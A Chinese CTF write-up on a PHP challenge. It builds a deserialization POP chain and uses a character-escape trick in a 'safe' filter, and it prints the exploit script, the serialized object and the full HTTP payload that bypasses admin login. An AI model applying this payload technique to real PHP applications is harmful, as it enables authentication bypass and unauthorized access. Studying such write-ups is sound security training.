<>知识点

* 反序列化pop链
* 反序列化字符逃逸
<>解题过程

www.zip 备份文件获取源码

审计代码构造pop链
<?php Class UpdateHelper{ public $id; public $newinfo; public $sql; } class
User { public $id; public $age; public $nickname; public function __toString() {
$this->nickname->update($this->age); return "0-0"; } } class dbCtrl { public
$hostname="127.0.0.1"; public $dbuser="root"; public $dbpass="root"; public
$database="test"; public $name; public $password; public $mysqli; public $token;
} class Info{ public $age; public $nickname; public $CtrlCase; public function
__call($name,$argument){ echo $this->CtrlCase->login($argument[0]); } } $a = new
UpdateHelper(); $b = new User(); $c = new Info(); $d = new dbCtrl(); $d->name =
"admin"; $d->password = "1"; $c->CtrlCase = $d; $b->nickname = $c; $b->age =
'select id, "c4ca4238a0b923820dcc509a6f75849b" from user where username=?'; $a->
sql = $b; $s = serialize($a); $obj_dream = new Info(); $obj_dream->age = "1";
$obj_dream->nickname = "11"; $obj_dream->CtrlCase = $a; echo serialize(
$obj_dream); <?php Class UpdateHelper{ public $id; public $newinfo; public $sql;
} class User { public $id; public $age; public $nickname; public function
__toString() { $this->nickname->update($this->age); return "0-0"; } } class
dbCtrl { public $hostname="127.0.0.1"; public $dbuser="root"; public $dbpass=
"root"; public $database="test"; public $name; public $password; public $mysqli;
public $token; } class Info{ public $age; public $nickname; public $CtrlCase;
public function __call($name,$argument){ echo $this->CtrlCase->login($argument[0
]); } } $a = new UpdateHelper(); $b = new User(); $c = new Info(); $d = new
dbCtrl(); $d->name = "admin"; $d->password = "1"; $c->CtrlCase = $d; $b->
nickname = $c; $b->age = 'select id, "c4ca4238a0b923820dcc509a6f75849b" from
user where username=?'; $a->sql = $b; $s = serialize($a); $obj_dream = new Info(
); $obj_dream->age = "1"; $obj_dream->nickname = "11"; $obj_dream->CtrlCase = $a
; echo serialize($obj_dream);

O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:2:"11";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select
id, "c4ca4238a0b923820dcc509a6f75849b" from user where
username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}
漏洞处只能传递两个参数

但是有safe这个替换函数

存在反序列化字符逃逸漏洞,可以逃逸任意数量的字符

用字符逃逸传递三个参数进去

需要逃逸的字符串为

";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select
id, "c4ca4238a0b923820dcc509a6f75849b" from user where
username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}
总共466个字符

由safe函数可知 *替换成hacker多5个字符 union替换成hacker多一个字符

93个*加1个union即可逃逸466个字符

payload为

age=1&nickname=*********************************************************************************************union";s:8:"CtrlCase";O:12:"UpdateHelper":3:{s:2:"id";N;s:7:"newinfo";N;s:3:"sql";O:4:"User":3:{s:2:"id";N;s:3:"age";s:72:"select
id, "c4ca4238a0b923820dcc509a6f75849b" from user where
username=?";s:8:"nickname";O:4:"Info":3:{s:3:"age";N;s:8:"nickname";N;s:8:"CtrlCase";O:6:"dbCtrl":8:{s:8:"hostname";s:9:"127.0.0.1";s:6:"dbuser";s:4:"root";s:6:"dbpass";s:4:"root";s:8:"database";s:4:"test";s:4:"name";s:5:"admin";s:8:"password";s:1:"1";s:6:"mysqli";N;s:5:"token";N;}}}}}

注入后,session[token]为admin,再以admin为账号,任意密码即可登录,拿到flag

技术
下载桌面版
GitHub
Gitee
SourceForge
百度网盘(提取码:draw)
云服务器优惠
华为云优惠券
腾讯云优惠券
阿里云优惠券
Vultr优惠券
站点信息
问题反馈
邮箱:[email protected]
吐槽一下
QQ群:766591547
关注微信